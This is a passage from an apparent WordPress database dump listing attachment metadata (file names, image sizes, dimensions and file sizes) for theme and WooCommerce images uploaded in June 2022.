nail\";a:6:{s:4:\"file\";s:19:\"aboutbg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12267;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"aboutbg-600x467.png\";s:5:\"width\";i:600;s:6:\"height\";i:467;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32012;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"aboutbg-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2164;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(199,2090,'_wp_attached_file','2022/06/image-why-choose.jpg'),(200,2090,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1032;s:6:\"height\";i:578;s:4:\"file\";s:28:\"2022/06/image-why-choose.jpg\";s:8:\"filesize\";i:186895;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"image-why-choose-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9981;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"image-why-choose-1024x574.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:574;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80627;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"image-why-choose-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5153;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"image-why-choose-768x430.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:430;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48606;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:28:\"image-why-choose-768x578.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72026;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:28:\"image-why-choose-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27702;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:28:\"image-why-choose-378x578.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:578;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35102;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:28:\"image-why-choose-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64694;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:28:\"image-why-choose-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15878;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:28:\"image-why-choose-600x336.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:336;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31808;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:28:\"image-why-choose-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2982;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(202,2116,'_wp_attached_file','2022/06/bg-whychoose.png'),(203,2116,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:698;s:4:\"file\";s:24:\"2022/06/bg-whychoose.png\";s:8:\"filesize\";i:26317;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-300x109.png\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1745;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"bg-whychoose-1024x372.png\";s:5:\"width\";i:1024;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12323;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:172;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-768x279.png\";s:5:\"width\";i:768;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7888;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"bg-whychoose-1536x558.png\";s:5:\"width\";i:1536;s:6:\"height\";i:558;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23360;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1321;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:710;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-378x698.png\";s:5:\"width\";i:378;s:6:\"height\";i:698;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:952;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4752;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"bg-whychoose-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:477;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-600x218.png\";s:5:\"width\";i:600;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5426;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"bg-whychoose-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(205,2325,'_wp_attached_file','2022/06/image.png'),(206,2325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:529;s:4:\"file\";s:17:\"2022/06/image.png\";s:8:\"filesize\";i:116826;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"image-210x300.png\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89854;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32324;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:17:\"image-370x473.png\";s:5:\"width\";i:370;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123413;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:17:\"image-370x473.png\";s:5:\"width\";i:370;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:123413;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"image-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122343;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"image-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15161;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(208,2346,'_wp_attached_file','2022/06/about-me-flexible-output.jpg'),(209,2346,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:271;s:4:\"file\";s:36:\"2022/06/about-me-flexible-output.jpg\";s:8:\"filesize\";i:50153;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"about-me-flexible-output-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15675;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"about-me-flexible-output-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6268;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:36:\"about-me-flexible-output-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17699;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:36:\"about-me-flexible-output-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(210,2347,'_wp_attached_file','2022/06/about-me-new-material.jpg'),(211,2347,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:271;s:4:\"file\";s:33:\"2022/06/about-me-new-material.jpg\";s:8:\"filesize\";i:45111;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"about-me-new-material-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13227;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"about-me-new-material-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5849;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"about-me-new-material-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16039;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"about-me-new-material-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3322;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(212,2348,'_wp_attached_file','2022/06/about-me-planning-stage.jpg'),(213,2348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:370;s:6:\"height\";i:271;s:4:\"file\";s:35:\"2022/06/about-me-planning-stage.jpg\";s:8:\"filesize\";i:50735;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"about-me-planning-stage-300x220.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14938;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"about-me-planning-stage-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5816;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"about-me-planning-stage-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17061;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"about-me-planning-stage-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3249;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,2350,'_wp_attached_file','2022/06/cropped-thumbnail.png'),(215,2350,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:29:\"2022/06/cropped-thumbnail.png\";s:8:\"filesize\";i:24011;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19580;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10843;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19450;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-378x512.png\";s:5:\"width\";i:378;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11920;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-512x473.png\";s:5:\"width\";i:512;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14135;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:29:\"cropped-thumbnail-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19580;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:29:\"cropped-thumbnail-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6000;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(216,2350,'_wp_attachment_context','site-icon'),(217,2413,'_wp_attached_file','2022/06/service-02.jpg'),(218,2413,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:453;s:4:\"file\";s:22:\"2022/06/service-02.jpg\";s:8:\"filesize\";i:120790;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"service-02-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11321;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"service-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4791;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"service-02-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60707;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-02-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67464;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-02-390x453.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29689;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"service-02-378x453.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28790;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"service-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15599;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"service-02-600x353.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39095;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2572;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(219,2414,'_wp_attached_file','2022/06/service-03.jpg'),(220,2414,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:770;s:4:\"file\";s:22:\"2022/06/service-03.jpg\";s:8:\"filesize\";i:148936;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"service-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21934;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"service-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6614;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"service-03-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123031;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-03-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:112112;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-03-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42686;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"service-03-378x770.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:770;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80789;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"service-03-770x473.jpg\";s:5:\"width\";i:770;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97813;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"service-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21934;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"service-03-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79359;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3490;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(221,2415,'_wp_attached_file','2022/06/service-04.jpg'),(222,2415,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:770;s:6:\"height\";i:513;s:4:\"file\";s:22:\"2022/06/service-04.jpg\";s:8:\"filesize\";i:154227;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"service-04-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16999;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"service-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6567;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"service-04-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90331;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-04-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105164;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-04-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41921;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"service-04-378x513.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50137;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"service-04-770x473.jpg\";s:5:\"width\";i:770;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97601;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"service-04-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21940;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"service-04-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57978;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"service-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3461;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(223,2434,'_wp_attached_file','2022/06/blog-01.jpg'),(224,2434,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:472;s:4:\"file\";s:19:\"2022/06/blog-01.jpg\";s:8:\"filesize\";i:174858;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"blog-01-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14616;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7271;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"blog-01-768x378.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:378;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68760;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-01-768x472.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89771;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"blog-01-390x472.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38621;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"blog-01-378x472.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37367;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"blog-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21667;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"blog-01-600x295.j